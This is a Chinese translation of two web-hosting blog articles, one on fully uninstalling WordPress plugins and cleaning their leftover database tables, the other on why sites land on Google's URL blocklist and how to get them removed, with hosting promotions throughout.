仅在知识库上就有超过 50,000 个 WordPress 插件,你很可能会测试和比较一些不同的插件来完成任务或解决你网站上的问题。当你使用完一个程序后,你可以简单地通过停用和删除来卸载它,对吗?错了,这样做的问题是,它会在你的 WordPress 数据库中留下表格和行,随着时间的推移,这可能会很快增加,这反过来会影响你的网站的性能,甚至会耗费你的磁盘空间。今天我们将向你展示一些关于如何卸载 WordPress 插件的技巧,正确的方法是确保你的数据库保持小而快。
- 如何卸载仪表盘中的 WordPress 插件
- 如何通过 FTP 卸载 WordPress 插件
- 卸载 WordPress 插件的大问题
- 如何卸载 WordPress 插件(正确方法)
- 如何手动清理插件遗留的表格
如何在仪表板中卸载 WordPress 插件
在我们深入探讨如何正确卸载一个 WordPress 插件之前,让我们先讨论一下用户在 WordPress 中删除插件的典型方式。第一个是简单地从仪表板。按照下面的步骤卸载 WordPress 的正常方式(不删除数据)。
第一步
在您的控制面板中导航到“已安装的插件”,然后单击插件旁边的“停用”。在这个例子中,我们正在卸载 Wordfence 安全插件。
Deactivate WordPress plugin
第二步
最后一步是简单地点击“删除”
删除 WordPress 插件
T5
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
如何通过 FTP 卸载 WordPress 插件
用户使用的第二种常见方法是通过 FTP 卸载插件(不删除数据)。请遵循以下步骤。
第一步
通过 SFTP 连接到你的 WordPress 网站。
第二步
浏览到您的/wp-content/plugins/文件夹。然后从你的服务器上删除插件文件夹。
Delete WordPress plugin via FTP
很简单,对吧?嗯,在大多数情况下,上面的方法是卸载插件的错误方式,尤其是如果你再也不想使用这个插件的话。
卸载 WordPress 插件的最大问题是
每当你安装一个 WordPress 插件或主题时,它会将数据存储在数据库中。问题是当你用上面显示的简单方法删除一个插件时,它通常会在你的数据库中留下表格和行。随着时间的推移,这可能会积累大量的数据,甚至会降低网站的运行速度。在我们的例子中,我们卸载了 Wordfence 安全插件,它在我们的数据库中留下了 24 个表(如下所示)!
Wordfence tables left behind after deleting the plugin
除了数据库,很多插件还会留下额外的文件夹和文件。根据我们的经验,这在创建额外的日志目录的安全和缓存插件中很常见。例如,在 Wordfence 插件被删除后,我们的 wp-content 目录中只剩下一个“wflogs”文件夹。我们并不是要挑 Wordfence 的毛病,市场上的大多数插件和主题都是这样工作的。
Wordfence logs
不幸的是,如果你一直在用上面的简单方法卸载插件,你的 WordPress 站点可能需要做大量的清理工作。记住停用一个插件只会使它不活动。你的网站上目前有多少不活跃的插件?如果它比活跃的数量多,那可能不是一件好事。你应该考虑完全删除不活跃的插件,因为它们仍然会带来安全风险,即使没有运行,也只会让你的数据库膨胀。
非活动 WordPress 插件
开发商为什么要这么做?
所以你可能想知道,为什么当你卸载和删除一个插件时,开发者没有自清理选项?事实上,他们有。但是,这里有几个原因可以解释为什么它们可能不会马上显现出来。
他们希望为用户保留设置
第一个原因是很多 WordPress 用户经常在插件之间切换,通过将表格和行留在数据库中,这保留了你的设置。这意味着你可以在以后重新安装插件,你所有的数据仍然会在那里。或者如果由于某种原因插件被意外删除,你不必惊慌。对于不太懂技术的用户来说,这无疑是一种优势,然而,这并不是最有效的方式。
但是,如果出于某种原因,你认为你以后可能会返回到一个插件,那么是的,简单地删除插件使用上述方法之一是最好的途径。
他们不关心性能
不幸的是,我们看到的另一个原因是,一些开发人员可能会认为留下表不会影响站点的性能。但是想象一下,一个网站在 10 年的时间里,使用了数百个插件,可能生成了数千行或数千个表格。数据库查询对你的 WordPress 网站的性能有很大的影响,如果开发者不小心的话插件会发出很多这样的请求。一般来说,一个编写良好的插件应该只查询它所绑定的表或行,然而,情况并非总是如此。
我们已经在 Kinsta 上看到过这种第一手资料,由于 wp_options 表中不必要的自动加载的数据被留下,长时间的数据库查询使一个网站被抓取。
然后就是磁盘空间的问题。大多数 web 主机按您使用的磁盘空间量收费或有限制,这包括您的数据库。
他们犯了个错误
WordPress 插件手册是为开发者准备的,里面有关于如何停用插件和卸载插件(删除数据)的最佳实践。甚至它说:
缺乏经验的开发人员有时会犯错误,为此使用停用挂钩。
如果这个错误是由开发人员造成的,这意味着当卸载应该删除所有的数据时,它只是运行了停用过程,留下了所有的数据。
大多数都有清理方法
然而,有一个好消息,因为他们中的许多人实际上有办法做适当的清理,你可能只是没有使用他们。然而,尽管如此,他们中的许多人仍然没有让用户足够清楚如何正确地卸载他们的插件。凯文·马尔登,一个网络营销者和博客,最近在他关于为什么 WordPress.org 需要强制卸载选项的文章中提到了这个话题。在理想情况下,当你卸载一个 WordPress 插件时,它会提示你三个不同的选项。
- 删除插件
- 删除插件和数据
- 删除插件、数据和设置(完全删除)
但是事情还不是这样运作的。如果最终能在存储库中看到这样的东西就好了。
When it comes to #WordPress performance, database bloat plays a huge part. 🐌Click to Tweet
如何卸载 WordPress 插件(正确的方法)
今天我们将向你展示一些关于如何正确卸载 WordPress 主题和/或插件的建议和技巧。这可能包括使用开发人员可选的完全删除过程或必须在数据库中进行自我清理。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
第一步
在这个例子中,我们将继续使用 Wordfence 插件。以正确的方式卸载 WordPress 插件的一个问题是,每个开发者对待这个问题的方式都有所不同。这意味着,很有可能你需要做一个快速的谷歌搜索,检查开发者网站上的文档,或者给他们发一封快速的电子邮件。正如你在下面看到的,我们谷歌了“如何卸载 wordfence”,返回的第一件事就是,他们的官方文件关于如何完全移除 word fence。
How to uninstall Wordfence
第二步
一个开发良好的插件应该在插件的设置中包含一个选项来完成完全卸载。你可以在下面流行的 Gravity Forms 插件中看到一个例子。快速点击“卸载重力表格”按钮,所有的表格和数据都不见了。
Uninstall Gravity Forms
这是 Polylang 多语言插件的另一个例子。你可以看到,在他们的工具部分有一个选项,当使用“删除”链接删除所有数据。必须首先启用它。
Polylang remove plugin data
如果你没有以正确的方式卸载多语言插件,他们将继续不必要地更新其他第三方插件的翻译数据,即使在它们被删除后。
Old translation data in database
奇怪的是,Wordfence 建议你安装另一个插件,即 Wordfence Assistant ,它将帮助你完全删除插件、数据和设置。正如你在下面看到的,一旦插件安装完毕,就可以选择删除 Wordfence 数据和表格,清除所有锁定的 IP,以及实时流量数据。
Remove WordFence completely
其他 WordPress 插件可能需要更复杂的卸载过程,例如 WooCommerce ,在删除 wp-config.php 文件之前,你必须将下面的代码放入其中,以完全删除所有数据。
define( 'WC_REMOVE_ALL_DATA', true);
但是这就是为什么在你简单地停用和删除一个插件之前,你要确保你是在以最有效的方式做这件事。以下是一些流行的 WordPress 插件的卸载指南的快捷方式,有些人有时会有问题:
移除未使用的短代码
如果你正在使用一个利用短代码的插件,然后你删除了这个插件,你的网站看起来会很奇怪,直到你替换掉它们。如果你想暂时禁用旧插件的短代码,只需在你的 functions.php 文件中使用以下代码;用插件的实际短代码标签更新“pluginshortcode”。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
add_shortcode( 'pluginshortcode', '__return_false' );
这将使它们完全不能显示。但是请记住,如果你想在原来的插件中再次使用它们,你需要删除代码。然而,当你用一个更新的插件的短代码格式替换短代码时,这可能是一个快速清理你的站点的方法。
如何手动清理插件留下的表格
可能会有这样的时候,你已经卸载了一个插件,你只是需要做一个清理。或者,开发人员的完全删除方法实际上是指手动删除数据库表。有两种方法可以解决这个问题,一种是使用表格清理插件,另一种是直接在 phpMyAdmin 中删除表格。
在这两种方法中,我们强烈建议你事先做一个 WordPress 站点备份。如果你是 Kinsta 的用户,你可以在 MyKinsta 的仪表盘上点击一下创建一个备份。
Create WordPress backup
或者利用众多流行的 WordPress 备份插件中的一个。
用插件清理表格
你最好的插件选择可能是高级数据库清理器。这是一个高级插件,但是它可以扫描你的 WordPress 安装并允许你删除孤立的表格。正如你在下面看到的,它从不再安装的插件中获得了 EDD (wp_edd)、重力表格(wp_gf)和布鲁姆(et_bloom,et_social)表格。
Detect orphaned tables
清理 phpMyAdmin 中的表
您也可以在 phpMyAdmin 中手动清理这些表。比起使用插件,我们更喜欢这种方法。很多插件会给它们的表格起一个类似于插件名字的名字。在这个例子中,根据他们的文档,我们将完全删除 Yoast SEO 。事实上,Yoast SEO 的插件中没有这个选项,如果你想完全卸载它并删除数据,你唯一的选择就是在 phpMyAdmin 中完成。在他们的文件中,他们声明:
如果您想删除我们插件的所有痕迹,请在数据库中搜索包含 wpseo 的条目,并手动删除数据。
要做到这一点,只需登录 phpMyAdmin 。在“搜索”标签下输入“wpseo”,选择所有的表,然后点击“Go”
Search wpseo in database
在我们的站点上,在 wp_options 表、wp_postmeta 表和 wp_usermeta 表中找到了匹配项。您可以在每个表上单击 then 并删除包含“wpseo”的行。
Yoast tables
下面是 wp_options 表。确保首先通过“wpseo”过滤行,因为有其他特定的行可能在 option_value 中包含“wpseo ”,比如 WordPress cron job 行。这一点非常重要,不容忽视。过滤后,您可以选择并删除它们。
wp_options table Yoast SEO
下面是 wp_postmeta 表。删除包含“wpseo”的行
wp_postmeta table Yoast SEO
这里是 wp_usermeta 表。同样,首先通过“wpseo”过滤行是非常重要的然后选择剩余的并删除它们。
wp_usermeta table Yoast SEO
如果你正在使用新的文本链接计数器特性,你还必须删除两个额外的 Yoast SEO 表;wp_yoast_seo_links 和 wp_yoast_seo_meta。
Drop Yoast SEO tables
最后一件事是清理 CRON 作业,如果有一个与插件一起运行的话。当然,您可以编辑 wp_options 表中的 cron 作业行,但是确保您不修改错误行的更简单的方法是用免费的 WP Crontrol 插件删除 CRON 作业。在 Yoast SEO 插件的例子中,它使用了一个名为“wpseo_onpage_fetch”的 Cron 作业,这个作业很容易被删除。
Delete wpseo_onpage_fetch cron job
摘要
如果你以前不知道,希望你现在知道更多关于如何正确卸载 WordPress 插件的知识。大多数插件都有很好的文档来说明如何完全删除它们,甚至在它们的设置中有一个选项。如果所有这些都失败了,试着谷歌一下如何去除它们。
推荐教程:如何禁用 WordPress 插件(无 WP-Admin 权限)
所以下次你去删除一个插件的时候,决定你是否需要这些数据。如果你不知道,那就花一点时间来查找完全卸载插件的正确方法。这将确保您的数据库保持较小,并将磁盘大小降至最低。不要忘记通过删除和限制修订来优化你的数据库。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
什么是谷歌网址黑名单?(分三步从黑名单中删除您的网站)
如今,URL 阻止列表已经成为一种常见现象,精明的企业主尽一切可能避免这种情况,这一点很重要。
如果你的网站出现在 URL 黑名单上,那么你会看到对你的网站流量和整体网站性能有很大的负面影响。
幸运的是,我们把这篇文章放在一起,给你一些你需要的信息,以防止你的网站进入 URL 阻止列表,并在不幸的情况下删除它。
信息
你可能偶然发现了过去使用的“黑名单”这个术语。在 Kinsta,我们完全支持并接受使用更具描述性且不含任何种族主义/性别含义的新技术术语的全行业方法。因此,我们正在相应地更新我们所有的内容。
什么是 URL 阻止列表?
URL 阻止列表是由搜索引擎收集的他们认为可疑或危险的网址。
被列入黑名单的网站不会出现在搜索引擎的结果页面上,这是为了保护他们的用户免受任何潜在的恶意软件或不安全插件的攻击。
以下是被阻止的站点在您的浏览器中的样子:
An example of what you’ll see in your browser when visiting a blocklisted site
尽管大多数被列入黑名单的网站确实是危险的,但完全无辜的网站发现自己被列入黑名单是很常见的。
有时他们甚至不知道这已经发生了,只有当他们的收入开始受到打击或者流量完全下降时,他们才会意识到。
事实上,谷歌每天屏蔽大约 10,000 个网站,所以很容易看出一些好网站是如何被遗漏的。
为了防止这种情况发生在你身上,你需要确保你的网站安全足够严密,以满足搜索引擎的严格规则和规定。
URL 阻止列表是如何发生的?
一个 URL 可能会因为各种不同的原因被列入黑名单。
这可能是完全无辜的事情,也可能是你的网站设置偷工减料的结果,在谷歌的雷达上标记你的网站。
下面你会发现搜索引擎在决定屏蔽哪些网站时主要关注的事情。
即使你的网站有这些问题中的一个,也可能意味着它永远不会出现在大多数搜索者面前,或者至少排名会下降。
1.不安全插件
插件是网站所有者、网站管理员和网站开发者经常使用的工具用来给网站添加额外的功能。它们非常有用,可以迅速将一个普通的网页变成更吸引用户的东西。
然而,由于插件可以由任何人开发和发布,所以很难知道哪些插件可以安全地安装在你的网站上。
根据已知 WordPress 问题的数据,几乎 18%是 WordPress 插件漏洞:
Breakdown of WordPress vulnerabilities. (Source: wpwhitesecurity.com)
不安全插件可以被用来注入恶意软件,一般被黑客用来轻松进入你的网站。
通常是过时的插件最容易受到攻击。这些插件通常只有很少的安全层,更容易被黑客攻击。
一方面,插件提供了令人难以置信的功能和好处,但另一方面,当 WordPress 维护被忽视时,它们很容易被接管并用于恶意目的。
T3】
2.网络钓鱼计划
不幸的是,近年来网络钓鱼变得非常流行。仅在 2020 年 3 月就报告了超过 60,000 个钓鱼网站。
An overview of phishing statistics. (Source: apwg.org)
网络钓鱼是一种数字攻击,用于通过诱骗用户点击误导性链接来获取个人信息,如银行信息。
网络钓鱼攻击会对受害者造成毁灭性的影响。
银行账户被盗是网络钓鱼的常见结果,在更严重的情况下,还可能发生身份盗窃。正是由于这些原因,搜索引擎正在打击任何可能包含网络钓鱼链接的网站。
最糟糕的是,许多网站所有者没有意识到他们的网站有钓鱼链接——黑客通常会在网站上发布恶意链接之前控制网站。这可能会导致搜索引擎的严厉惩罚。
3.特洛伊木马
在计算术语中,特洛伊木马是一种伪装成无害的病毒或恶意软件。网络犯罪分子通常将恶意文件隐藏在一个软件中,然后在下载该软件时感染计算机。
A simple breakdown of how a trojan horse works. (Source: imperva.com)
特洛伊木马类似于网络钓鱼方案,因为它们是专门设计来欺骗某人在不知情的情况下安装有害软件的。
正如你所料,这个过程是搜索引擎所不喜欢的,也是为什么一个被怀疑有可下载恶意软件的 URL 会被立即阻止的最大原因之一。
如果你想让你的网站有任何机会在谷歌排名中接近顶端,让你的网站远离特洛伊木马是非常重要的。
T3】
4.磨损
网站污损攻击是指黑客接管网站的控制权,并用自己的内容替换部分内容。
通常,这是通过添加网络钓鱼链接、特洛伊木马和其他潜在的有害恶意软件来实现的。
An example of a website defacement attack. (Source: securityboulevard.com)
一些黑客将能够创建看起来与你自己的内容几乎一样的内容,这意味着你的用户和客户可能甚至不会注意到任何变化。
URL 阻止列表旨在将这些网站从搜索引擎中移除,以免任何人成为被污损页面的受害者。
5.SEO 垃圾邮件
搜索引擎最不希望看到的是 SEO 垃圾邮件。有点讽刺的是,过度的 SEO 会对一个网站的排名产生负面影响。
An example of SEO spam in Google. (Source: Sucuri)
消极的搜索引擎优化会以各种形式阻碍你的搜索引擎优化进程。像 DDos 攻击、 WordPress 垃圾评论和谷歌分析中的垃圾推荐都是需要警惕的事情。
SEO 垃圾邮件的另一种流行形式是关键字填充。搜索引擎使用来自用户查询的关键词来匹配他们的搜索和最相关的网页。
一些网站所有者认为,如果他们把大量的目标关键词打包到他们的所有页面中,那么他们会更频繁地出现在搜索引擎中。
然而,搜索引擎提供商非常清楚这种做法,可以很容易地过滤掉任何塞满了太多关键字的文章
如何检查您的网站是否被添加到 url 黑名单
正如我们提到的,你的网站被列入黑名单的主要问题是,当它发生时,你很难注意到。
有各种各样的工具可以告诉你你的网站是否被列入黑名单。它们还会将您引向导致问题的特定 URL,然后您可以根据需要处理和删除这些 URL。
以下是检查您的网站是否被列入黑名单的三种方法:
1.谷歌搜索控制台
查看你是否被列入黑名单的一个最简单的方法是查看谷歌搜索控制台(以前被称为网站管理员工具):
How to view any security issues in Google Search Console
如果你还没有验证你的 GSC 帐户,去阅读这个谷歌搜索控制台验证指南然后回来。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
如果您的网站不幸被阻止,您可以在这里看到它:
An example of what you may see inside Google Search Console if your site (or a URL) is blocklisted
2.检查您的流量统计
同样值得检查的是你的 Google Analytics 账户中的流量是否有大幅下降。访问者的突然减少可能是被阻止的信号。
An example of something no one wants to see in Google Analytics: a massive drop in website traffic
一个网站被列入黑名单的早期迹象是流量突然快速下降。
一个被列入黑名单的网站会损失大约 95%的流量,所以你应该能注意到这一点。如果你在你的网站分析中看到类似的东西,那么肯定有一个问题值得进一步调查。
3.现场检查工具
如果你想测试你的域名或 IP 是否被列入反垃圾邮件数据库,你也可以使用专门的网站检查工具。
只需通过 Sitechecker 和/或 MxToolBox 运行你的网站并检查结果。
Run your site through these site checker tools
在这两者之间,这些现场检查工具将:
为了更加小心,你还应该查看一下关于如何阻止 IP 地址的指南,以及关于专用 IP 地址和共享 IP 地址的指南。
被列入 URL 阻止列表会对您的业务产生什么影响?
显而易见,如此大的流量下降会对您的业务、增长和利润产生负面影响。
不管是 Chrome、Internet Explorer 还是其他浏览器,用户使用的是哪种浏览器都没关系。一个被阻止的网址不会出现在任何一个页面上。
被列入黑名单绝对是任何网站所有者都应该不惜一切代价避免的事情。
在下一节中,我们将介绍一些你可以实施的策略,以确保你的 URL 永远不会进入任何 URL 阻止列表。
如何保护你的网站不被列入黑名单
远离黑名单的唯一真正方法是确保你的网站上没有发生任何会引起谷歌负面关注的事情。不幸的是,自己遵守规则并不总是足够的,因为我们知道黑客可以接管网站并声称它们是自己的。
这意味着如果你想遵循有效的搜索引擎优化最佳实践并保持网站的高流量,你必须考虑一些不同的事情。
担心你的 WordPress 网站上的恶意软件?所有 Kinsta 计划都附带免费的恶意软件扫描和清理。查看我们的计划。
简而言之,你应该:
- 确保你的网站是安全的,
- 以安全的方式构建和开发您的网站,
- 尽可能避免危险的“黑帽”行为。
谢天谢地,如果网站所有者想确保他们的网站不会遇到安全问题,他们可以采取一些措施。
更新,更新,更新
第一件事是始终保持你的系统更新,密切关注插件和主题更新。软件更新修复了安全漏洞,所以你总是想在黑客找到如何利用这些漏洞之前下载它们。
在对你的站点进行更新之前,最好在本地和/或在 T2 的测试环境中进行测试。
使用强密码
另一个更明显的安全协议是始终使用强密码。是的,我们知道你以前听说过这个,但是仍然有惊人数量的人使用'pa 55 w0 rd'作为他们所有帐户的安全密钥。
一个强有力的密码真的可以阻止黑客的踪迹,并保护您的服务器免受渗透。
请务必查看这些与密码相关的资源:
避免让用户上传文件
另一个建议是尽量避免让网站用户上传自己的文件。
虽然您可能希望通过向网站上传个人资料图片和类似文件来改善用户体验,但这可能会成为人们利用的一大潜在漏洞。
如果你运营的网站需要用户上传文件,我们建议与开发者合作,在文件上传过程中加入恶意软件扫描步骤。
避免冒险的做法
如果你想有最好的机会让你的网址远离任何黑名单,那么你应该尽量避免任何危险的做法。
在 SEO 世界中,这些通常被称为“黑帽”过程。
尽管这些技术在短期内是有效的,但是如果实施不当,很容易产生负面影响。
然而,你应该绝对避免的是像关键字填充这样的事情。
关键词填充、隐藏的关键词和通常与你的品牌/产品/服务不一致的文章会很快在谷歌上标记你的网站。然后,谷歌将开始从他们的搜索中过滤你的网址,你会看到你的排名急剧下降。
如果你坚持正确的关键词研究和学习如何给你的网站带来流量,你会很安全。
现在你知道如何防止你的网站或网址被列入黑名单,让我们来看看你可以做些什么来删除黑名单中的网址。
如何通过 3 个步骤从谷歌黑名单中删除你的网址
如果您发现您的网站已经被谷歌列入黑名单,我们需要将其移除。以下是从黑名单中删除您的网站的分步指南。
第一步:找到感染源
打开谷歌搜索控制台看看为什么你的网站被列入黑名单,这可能是由于:
- 病毒
- SQL 注入
- 垃圾链接
- 恶意软件
无论是什么原因导致了阻止列表,一旦您确定了原因,您就可以采取后续步骤来解决问题。
第二步:清除感染
一旦你知道是什么导致了感染,你就可以着手清除它。以下是开始清理站点感染的一些步骤:
- 检查对你网站的任何不熟悉的修改并手动删除它们。
- 禁用任何过时的插件。
- 检查是否添加了新的管理员用户。如果是,手动清除,重置所有密码和用户名。
- 手动清理受感染的数据库中的表。
- 为您的所有用户设置双因素认证。
- 检查任何未经验证的用户,并删除那些不应该在那里。
您可能还会发现这些资源很有帮助:
- 【WordPress 恶意软件清除如何工作
- 如何修复 WordPress 上的“前方网站包含恶意软件”错误
- WordPress 被黑:当你的网站陷入困境时该怎么办
- 16 个最好的 WordPress 安全插件来锁定坏人
第三步:提交给谷歌审查
接下来,你应该提交你的网站进行恶意软件审查,这样谷歌可以重新评估你的网站。按照以下步骤提交您的站点以供审查:
- 打开谷歌搜索控制台,转到安全问题选项卡。
- 点击“我已经修复了这些问题”。
- 现在,选择“请求审查”。
- 请列出您为消除网站上的问题所采取的步骤。在这里尽可能详细。
- 然后单击手动操作部分。
如果您有多个问题,重复这些步骤,直到所有问题都得到解决。请记住,谷歌可能需要几天时间来审查你的网站。
这也可能是一个很好的时间来刷新你的记忆,如何将你的网站提交给搜索引擎。
摘要
显而易见,黑名单会对你的网站流量和业务产生不利影响。
幸运的是,你可以做一些事情来减少这种情况的发生,比如遵循网页设计最佳实践、 SEO 最佳实践,以及投资安全托管。
尽管你总是可以采取一些措施来对抗黑客和恶意软件,但有时你只是运气不好。这就是为什么尽早发现阻止列表的迹象并尝试采取措施总是很重要的原因。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
